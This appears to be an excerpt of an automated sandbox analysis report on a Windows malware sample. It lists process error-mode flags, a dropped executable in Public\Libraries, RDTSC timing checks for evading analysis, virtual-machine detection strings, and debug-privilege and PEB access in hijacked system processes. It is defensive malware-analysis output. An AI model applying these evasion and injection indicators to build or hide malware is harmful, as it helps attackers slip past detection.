          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000010418604 second address: 000000001041860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 000000001041899E second address: 00000000104189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 0000000002D88604 second address: 0000000002D8860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 0000000002D8899E second address: 0000000002D889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E56DE6 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 4.2 %
          Source: C:\Users\user\Desktop\0321423605241625.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\0321423605241625.exe Code function: 0_2_02175B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
          Source: C:\Users\user\Desktop\0321423605241625.exe API call chain: ExitProcess graph end node graph_0-20130
          Source: C:\Users\user\Desktop\0321423605241625.exe API call chain: ExitProcess graph end node graph_0-20287
          Source: explorer.exe, 00000002.00000000.387219526.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.477730191.000000000ED50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.477730191.000000000ED50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}217G
          Source: explorer.exe, 00000002.00000000.312701350.00000000043B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 0321423605241625.exe, 00000000.00000002.307257682.000000000083B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0X
          Source: explorer.exe, 00000002.00000000.387219526.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: Mwqrxeuz.exe, 00000003.00000002.542721424.000000000074D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: 0321423605241625.exe, 00000000.00000002.307257682.000000000083B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW$
          Source: C:\Users\user\Desktop\0321423605241625.exe Code function: 0_2_02186388 InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualAlloc,VirtualProtect,FreeLibrary
          Source: C:\Windows\SysWOW64\colorcpl.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42ACB mov eax, dword ptr fs:[00000030h]1_2_06E42ACB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]1_2_06E152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]1_2_06E152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]1_2_06E152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]1_2_06E152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]1_2_06E152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2AAB0 mov eax, dword ptr fs:[00000030h]1_2_06E2AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2AAB0 mov eax, dword ptr fs:[00000030h]1_2_06E2AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4FAB0 mov eax, dword ptr fs:[00000030h]1_2_06E4FAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4D294 mov eax, dword ptr fs:[00000030h]1_2_06E4D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4D294 mov eax, dword ptr fs:[00000030h]1_2_06E4D294
